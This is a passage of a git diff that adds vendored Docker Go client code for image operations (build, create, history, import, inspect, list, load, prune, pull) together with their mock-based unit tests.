+				"ulimits": `[{"Name":"nproc","Hard":65557,"Soft":65557},{"Name":"nofile","Hard":20000,"Soft":40000}]`,
+				"rm":      "0",
+			},
+			expectedTags:           []string{},
+			expectedRegistryConfig: emptyRegistryConfig,
+		},
+		{
+			buildOptions: types.ImageBuildOptions{
+				AuthConfigs: map[string]types.AuthConfig{
+					"https://index.docker.io/v1/": {
+						Auth: "dG90bwo=",
+					},
+				},
+			},
+			expectedQueryParams: map[string]string{
+				"rm": "0",
+			},
+			expectedTags:           []string{},
+			expectedRegistryConfig: "eyJodHRwczovL2luZGV4LmRvY2tlci5pby92MS8iOnsiYXV0aCI6ImRHOTBid289In19",
+		},
+	}
+	for _, buildCase := range buildCases {
+		expectedURL := "/build"
+		client := &Client{
+			client: newMockClient(func(r *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(r.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+				}
+				// Check request headers
+				registryConfig := r.Header.Get("X-Registry-Config")
+				if registryConfig != buildCase.expectedRegistryConfig {
+					return nil, fmt.Errorf("X-Registry-Config header not properly set in the request. Expected '%s', got %s", buildCase.expectedRegistryConfig, registryConfig)
+				}
+				contentType := r.Header.Get("Content-Type")
+				if contentType != "application/tar" {
+					return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/tar', got %s", contentType)
+				}
+
+				// Check query parameters
+				query := r.URL.Query()
+				for key, expected := range buildCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+
+				// Check tags
+				if len(buildCase.expectedTags) > 0 {
+					tags := query["t"]
+					if !reflect.DeepEqual(tags, buildCase.expectedTags) {
+						return nil, fmt.Errorf("t (tags) not set in URL query properly. Expected '%s', got %s", buildCase.expectedTags, tags)
+					}
+				}
+
+				headers := http.Header{}
+				headers.Add("Server", "Docker/v1.23 (MyOS)")
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+					Header:     headers,
+				}, nil
+			}),
+		}
+		buildResponse, err := client.ImageBuild(context.Background(), nil, buildCase.buildOptions)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if buildResponse.OSType != "MyOS" {
+			t.Fatalf("expected OSType to be 'MyOS', got %s", buildResponse.OSType)
+		}
+		response, err := ioutil.ReadAll(buildResponse.Body)
+		if err != nil {
+			t.Fatal(err)
+		}
+		buildResponse.Body.Close()
+		if string(response) != "body" {
+			t.Fatalf("expected Body to contain 'body' string, got %s", response)
+		}
+	}
+}
+
+func TestGetDockerOS(t *testing.T) {
+	cases := map[string]string{
+		"Docker/v1.22 (linux)":   "linux",
+		"Docker/v1.22 (windows)": "windows",
+		"Foo/v1.22 (bar)":        "",
+	}
+	for header, os := range cases {
+		g := getDockerOS(header)
+		if g != os {
+			t.Fatalf("Expected %s, got %s", os, g)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_create.go b/vendor/github.com/docker/docker/client/image_create.go
new file mode 100644
index 0000000000..cf023a7186
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_create.go
@@ -0,0 +1,34 @@
+package client
+
+import (
+	"io"
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/reference"
+)
+
+// ImageCreate creates a new image based in the parent options.
+// It returns the JSON content in the response body.
+func (cli *Client) ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) {
+	repository, tag, err := reference.Parse(parentReference)
+	if err != nil {
+		return nil, err
+	}
+
+	query := url.Values{}
+	query.Set("fromImage", repository)
+	query.Set("tag", tag)
+	resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
+
+func (cli *Client) tryImageCreate(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	return cli.post(ctx, "/images/create", query, nil, headers)
+}
diff --git a/vendor/github.com/docker/docker/client/image_create_test.go b/vendor/github.com/docker/docker/client/image_create_test.go
new file mode 100644
index 0000000000..5c2edd2ad5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_create_test.go
@@ -0,0 +1,76 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestImageCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImageCreate(context.Background(), "reference", types.ImageCreateOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestImageCreate(t *testing.T) {
+	expectedURL := "/images/create"
+	expectedImage := "test:5000/my_image"
+	expectedTag := "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
+	expectedReference := fmt.Sprintf("%s@%s", expectedImage, expectedTag)
+	expectedRegistryAuth := "eyJodHRwczovL2luZGV4LmRvY2tlci5pby92MS8iOnsiYXV0aCI6ImRHOTBid289IiwiZW1haWwiOiJqb2huQGRvZS5jb20ifX0="
+	client := &Client{
+		client: newMockClient(func(r *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(r.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+			}
+			registryAuth := r.Header.Get("X-Registry-Auth")
+			if registryAuth != expectedRegistryAuth {
+				return nil, fmt.Errorf("X-Registry-Auth header not properly set in the request. Expected '%s', got %s", expectedRegistryAuth, registryAuth)
+			}
+
+			query := r.URL.Query()
+			fromImage := query.Get("fromImage")
+			if fromImage != expectedImage {
+				return nil, fmt.Errorf("fromImage not set in URL query properly. Expected '%s', got %s", expectedImage, fromImage)
+			}
+
+			tag := query.Get("tag")
+			if tag != expectedTag {
+				return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", expectedTag, tag)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	createResponse, err := client.ImageCreate(context.Background(), expectedReference, types.ImageCreateOptions{
+		RegistryAuth: expectedRegistryAuth,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	response, err := ioutil.ReadAll(createResponse)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err = createResponse.Close(); err != nil {
+		t.Fatal(err)
+	}
+	if string(response) != "body" {
+		t.Fatalf("expected Body to contain 'body' string, got %s", response)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_history.go b/vendor/github.com/docker/docker/client/image_history.go
new file mode 100644
index 0000000000..acb1ee9278
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_history.go
@@ -0,0 +1,22 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ImageHistory returns the changes in an image in history format.
+func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]types.ImageHistory, error) {
+	var history []types.ImageHistory
+	serverResp, err := cli.get(ctx, "/images/"+imageID+"/history", url.Values{}, nil)
+	if err != nil {
+		return history, err
+	}
+
+	err = json.NewDecoder(serverResp.body).Decode(&history)
+	ensureReaderClosed(serverResp)
+	return history, err
+}
diff --git a/vendor/github.com/docker/docker/client/image_history_test.go b/vendor/github.com/docker/docker/client/image_history_test.go
new file mode 100644
index 0000000000..729edb1ad5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_history_test.go
@@ -0,0 +1,60 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestImageHistoryError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImageHistory(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestImageHistory(t *testing.T) {
+	expectedURL := "/images/image_id/history"
+	client := &Client{
+		client: newMockClient(func(r *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(r.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+			}
+			b, err := json.Marshal([]types.ImageHistory{
+				{
+					ID:   "image_id1",
+					Tags: []string{"tag1", "tag2"},
+				},
+				{
+					ID:   "image_id2",
+					Tags: []string{"tag1", "tag2"},
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+	imageHistories, err := client.ImageHistory(context.Background(), "image_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(imageHistories) != 2 {
+		t.Fatalf("expected 2 containers, got %v", imageHistories)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_import.go b/vendor/github.com/docker/docker/client/image_import.go
new file mode 100644
index 0000000000..c6f154b249
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_import.go
@@ -0,0 +1,37 @@
+package client
+
+import (
+	"io"
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+)
+
+// ImageImport creates a new image based in the source options.
+// It returns the JSON content in the response body.
+func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) {
+	if ref != "" {
+		//Check if the given image name can be resolved
+		if _, err := reference.ParseNamed(ref); err != nil {
+			return nil, err
+		}
+	}
+
+	query := url.Values{}
+	query.Set("fromSrc", source.SourceName)
+	query.Set("repo", ref)
+	query.Set("tag", options.Tag)
+	query.Set("message", options.Message)
+	for _, change := range options.Changes {
+		query.Add("changes", change)
+	}
+
+	resp, err := cli.postRaw(ctx, "/images/create", query, source.Source, nil)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/image_import_test.go b/vendor/github.com/docker/docker/client/image_import_test.go
new file mode 100644
index 0000000000..e309be74e6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_import_test.go
@@ -0,0 +1,81 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"reflect"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestImageImportError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImageImport(context.Background(), types.ImageImportSource{}, "image:tag", types.ImageImportOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestImageImport(t *testing.T) {
+	expectedURL := "/images/create"
+	client := &Client{
+		client: newMockClient(func(r *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(r.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+			}
+			query := r.URL.Query()
+			fromSrc := query.Get("fromSrc")
+			if fromSrc != "image_source" {
+				return nil, fmt.Errorf("fromSrc not set in URL query properly. Expected 'image_source', got %s", fromSrc)
+			}
+			repo := query.Get("repo")
+			if repo != "repository_name:imported" {
+				return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name', got %s", repo)
+			}
+			tag := query.Get("tag")
+			if tag != "imported" {
+				return nil, fmt.Errorf("tag not set in URL query properly. Expected 'imported', got %s", tag)
+			}
+			message := query.Get("message")
+			if message != "A message" {
+				return nil, fmt.Errorf("message not set in URL query properly. Expected 'A message', got %s", message)
+			}
+			changes := query["changes"]
+			expectedChanges := []string{"change1", "change2"}
+			if !reflect.DeepEqual(expectedChanges, changes) {
+				return nil, fmt.Errorf("changes not set in URL query properly. Expected %v, got %v", expectedChanges, changes)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("response"))),
+			}, nil
+		}),
+	}
+	importResponse, err := client.ImageImport(context.Background(), types.ImageImportSource{
+		Source:     strings.NewReader("source"),
+		SourceName: "image_source",
+	}, "repository_name:imported", types.ImageImportOptions{
+		Tag:     "imported",
+		Message: "A message",
+		Changes: []string{"change1", "change2"},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	response, err := ioutil.ReadAll(importResponse)
+	if err != nil {
+		t.Fatal(err)
+	}
+	importResponse.Close()
+	if string(response) != "response" {
+		t.Fatalf("expected response to contain 'response', got %s", string(response))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_inspect.go b/vendor/github.com/docker/docker/client/image_inspect.go
new file mode 100644
index 0000000000..b3a64ce2f8
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_inspect.go
@@ -0,0 +1,33 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ImageInspectWithRaw returns the image information and its raw representation.
+func (cli *Client) ImageInspectWithRaw(ctx context.Context, imageID string) (types.ImageInspect, []byte, error) {
+	serverResp, err := cli.get(ctx, "/images/"+imageID+"/json", nil, nil)
+	if err != nil {
+		if serverResp.statusCode == http.StatusNotFound {
+			return types.ImageInspect{}, nil, imageNotFoundError{imageID}
+		}
+		return types.ImageInspect{}, nil, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	body, err := ioutil.ReadAll(serverResp.body)
+	if err != nil {
+		return types.ImageInspect{}, nil, err
+	}
+
+	var response types.ImageInspect
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&response)
+	return response, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/image_inspect_test.go b/vendor/github.com/docker/docker/client/image_inspect_test.go
new file mode 100644
index 0000000000..74a4e49805
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_inspect_test.go
@@ -0,0 +1,71 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"reflect"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestImageInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.ImageInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImageInspectImageNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, _, err := client.ImageInspectWithRaw(context.Background(), "unknown")
+	if err == nil || !IsErrImageNotFound(err) {
+		t.Fatalf("expected an imageNotFound error, got %v", err)
+	}
+}
+
+func TestImageInspect(t *testing.T) {
+	expectedURL := "/images/image_id/json"
+	expectedTags := []string{"tag1", "tag2"}
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(types.ImageInspect{
+				ID:       "image_id",
+				RepoTags: expectedTags,
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	imageInspect, _, err := client.ImageInspectWithRaw(context.Background(), "image_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if imageInspect.ID != "image_id" {
+		t.Fatalf("expected `image_id`, got %s", imageInspect.ID)
+	}
+	if !reflect.DeepEqual(imageInspect.RepoTags, expectedTags) {
+		t.Fatalf("expected `%v`, got %v", expectedTags, imageInspect.RepoTags)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_list.go b/vendor/github.com/docker/docker/client/image_list.go
new file mode 100644
index 0000000000..f26464f67c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_list.go
@@ -0,0 +1,45 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/versions"
+	"golang.org/x/net/context"
+)
+
+// ImageList returns a list of images in the docker host.
+func (cli *Client) ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) {
+	var images []types.ImageSummary
+	query := url.Values{}
+
+	optionFilters := options.Filters
+	referenceFilters := optionFilters.Get("reference")
+	if versions.LessThan(cli.version, "1.25") && len(referenceFilters) > 0 {
+		query.Set("filter", referenceFilters[0])
+		for _, filterValue := range referenceFilters {
+			optionFilters.Del("reference", filterValue)
+		}
+	}
+	if optionFilters.Len() > 0 {
+		filterJSON, err := filters.ToParamWithVersion(cli.version, optionFilters)
+		if err != nil {
+			return images, err
+		}
+		query.Set("filters", filterJSON)
+	}
+	if options.All {
+		query.Set("all", "1")
+	}
+
+	serverResp, err := cli.get(ctx, "/images/json", query, nil)
+	if err != nil {
+		return images, err
+	}
+
+	err = json.NewDecoder(serverResp.body).Decode(&images)
+	ensureReaderClosed(serverResp)
+	return images, err
+}
diff --git a/vendor/github.com/docker/docker/client/image_list_test.go b/vendor/github.com/docker/docker/client/image_list_test.go
new file mode 100644
index 0000000000..7c4a46414d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_list_test.go
@@ -0,0 +1,159 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+func TestImageListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ImageList(context.Background(), types.ImageListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImageList(t *testing.T) {
+	expectedURL := "/images/json"
+
+	noDanglingfilters := filters.NewArgs()
+	noDanglingfilters.Add("dangling", "false")
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+	filters.Add("dangling", "true")
+
+	listCases := []struct {
+		options             types.ImageListOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.ImageListOptions{},
+			expectedQueryParams: map[string]string{
+				"all":     "",
+				"filter":  "",
+				"filters": "",
+			},
+		},
+		{
+			options: types.ImageListOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"all":     "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true},"label":{"label1":true,"label2":true}}`,
+			},
+		},
+		{
+			options: types.ImageListOptions{
+				Filters: noDanglingfilters,
+			},
+			expectedQueryParams: map[string]string{
+				"all":     "",
+				"filter":  "",
+				"filters": `{"dangling":{"false":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]types.ImageSummary{
+					{
+						ID: "image_id2",
+					},
+					{
+						ID: "image_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		images, err := client.ImageList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(images) != 2 {
+			t.Fatalf("expected 2 images, got %v", images)
+		}
+	}
+}
+
+func TestImageListApiBefore125(t *testing.T) {
+	expectedFilter := "image:tag"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			query := req.URL.Query()
+			actualFilter := query.Get("filter")
+			if actualFilter != expectedFilter {
+				return nil, fmt.Errorf("filter not set in URL query properly. Expected '%s', got %s", expectedFilter, actualFilter)
+			}
+			actualFilters := query.Get("filters")
+			if actualFilters != "" {
+				return nil, fmt.Errorf("filters should have not been present, were with value: %s", actualFilters)
+			}
+			content, err := json.Marshal([]types.ImageSummary{
+				{
+					ID: "image_id2",
+				},
+				{
+					ID: "image_id2",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+		version: "1.24",
+	}
+
+	filters := filters.NewArgs()
+	filters.Add("reference", "image:tag")
+
+	options := types.ImageListOptions{
+		Filters: filters,
+	}
+
+	images, err := client.ImageList(context.Background(), options)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(images) != 2 {
+		t.Fatalf("expected 2 images, got %v", images)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_load.go b/vendor/github.com/docker/docker/client/image_load.go
new file mode 100644
index 0000000000..77aaf1af36
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_load.go
@@ -0,0 +1,30 @@
+package client
+
+import (
+	"io"
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+// ImageLoad loads an image in the docker host from the client host.
+// It's up to the caller to close the io.ReadCloser in the
+// ImageLoadResponse returned by this function.
+func (cli *Client) ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) {
+	v := url.Values{}
+	v.Set("quiet", "0")
+	if quiet {
+		v.Set("quiet", "1")
+	}
+	headers := map[string][]string{"Content-Type": {"application/x-tar"}}
+	resp, err := cli.postRaw(ctx, "/images/load", v, input, headers)
+	if err != nil {
+		return types.ImageLoadResponse{}, err
+	}
+	return types.ImageLoadResponse{
+		Body: resp.body,
+		JSON: resp.header.Get("Content-Type") == "application/json",
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/client/image_load_test.go b/vendor/github.com/docker/docker/client/image_load_test.go
new file mode 100644
index 0000000000..68dc14ff22
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_load_test.go
@@ -0,0 +1,95 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestImageLoadError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ImageLoad(context.Background(), nil, true)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImageLoad(t *testing.T) {
+	expectedURL := "/images/load"
+	expectedInput := "inputBody"
+	expectedOutput := "outputBody"
+	loadCases := []struct {
+		quiet                bool
+		responseContentType  string
+		expectedResponseJSON bool
+		expectedQueryParams  map[string]string
+	}{
+		{
+			quiet:                false,
+			responseContentType:  "text/plain",
+			expectedResponseJSON: false,
+			expectedQueryParams: map[string]string{
+				"quiet": "0",
+			},
+		},
+		{
+			quiet:                true,
+			responseContentType:  "application/json",
+			expectedResponseJSON: true,
+			expectedQueryParams: map[string]string{
+				"quiet": "1",
+			},
+		},
+	}
+	for _, loadCase := range loadCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				contentType := req.Header.Get("Content-Type")
+				if contentType != "application/x-tar" {
+					return nil, fmt.Errorf("content-type not set in URL headers properly. Expected 'application/x-tar', got %s", contentType)
+				}
+				query := req.URL.Query()
+				for key, expected := range loadCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				headers := http.Header{}
+				headers.Add("Content-Type", loadCase.responseContentType)
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))),
+					Header:     headers,
+				}, nil
+			}),
+		}
+
+		input := bytes.NewReader([]byte(expectedInput))
+		imageLoadResponse, err := client.ImageLoad(context.Background(), input, loadCase.quiet)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if imageLoadResponse.JSON != loadCase.expectedResponseJSON {
+			t.Fatalf("expected a JSON response, was not.")
+		}
+		body, err := ioutil.ReadAll(imageLoadResponse.Body)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(body) != expectedOutput {
+			t.Fatalf("expected %s, got %s", expectedOutput, string(body))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_prune.go b/vendor/github.com/docker/docker/client/image_prune.go
new file mode 100644
index 0000000000..5ef98b7f02
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_prune.go
@@ -0,0 +1,36 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// ImagesPrune requests the daemon to delete unused data
+func (cli *Client) ImagesPrune(ctx context.Context, pruneFilters filters.Args) (types.ImagesPruneReport, error) {
+	var report types.ImagesPruneReport
+
+	if err := cli.NewVersionError("1.25", "image prune"); err != nil {
+		return report, err
+	}
+
+	query, err := getFiltersQuery(pruneFilters)
+	if err != nil {
+		return report, err
+	}
+
+	serverResp, err := cli.post(ctx, "/images/prune", query, nil, nil)
+	if err != nil {
+		return report, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil {
+		return report, fmt.Errorf("Error retrieving disk usage: %v", err)
+	}
+
+	return report, nil
+}
diff --git a/vendor/github.com/docker/docker/client/image_pull.go b/vendor/github.com/docker/docker/client/image_pull.go
new file mode 100644
index 0000000000..3bffdb70e8
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_pull.go
@@ -0,0 +1,46 @@
+package client
+
+import (
+	"io"
+	"net/http"
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/reference"
+)
+
+// ImagePull requests the docker host to pull an image from a remote registry.
+// It executes the privileged function if the operation is unauthorized
+// and it tries one more time.
+// It's up to the caller to handle the io.ReadCloser and close it properly.
+//
+// FIXME(vdemeester): there is currently used in a few way in docker/docker
+// - if not in trusted content, ref is used to pass the whole reference, and tag is empty
+// - if in trusted content, ref is used to pass the reference name, and tag for the digest
+func (cli *Client) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) {
+	repository, tag, err := reference.Parse(ref)
+	if err != nil {
+		return nil, err
+	}
+
+	query := url.Values{}
+	query.Set("fromImage", repository)
+	if tag != "" && !options.All {
+		query.Set("tag", tag)
+	}
+
+	resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth)
+	if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil {
+		newAuthHeader, privilegeErr := options.PrivilegeFunc()
+		if privilegeErr != nil {
+			return nil, privilegeErr
+		}
+		resp, err = cli.tryImageCreate(ctx, query, newAuthHeader)
+	}
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/image_pull_test.go b/vendor/github.com/docker/docker/client/image_pull_test.go
new file mode 100644
index 0000000000..fe6bafed97
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_pull_test.go
@@ -0,0 +1,199 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestImagePullReferenceParseError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, nil
+		}),
+	}
+	// An empty reference is an invalid reference
+	_, err := client.ImagePull(context.Background(), "", types.ImagePullOptions{})
+	if err == nil || err.Error() != "repository name must have at least one component" {
+		t.Fatalf("expected an error, got %v", err)
+	}
+}
+
+func TestImagePullAnyError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImagePullStatusUnauthorizedError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	_, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{})
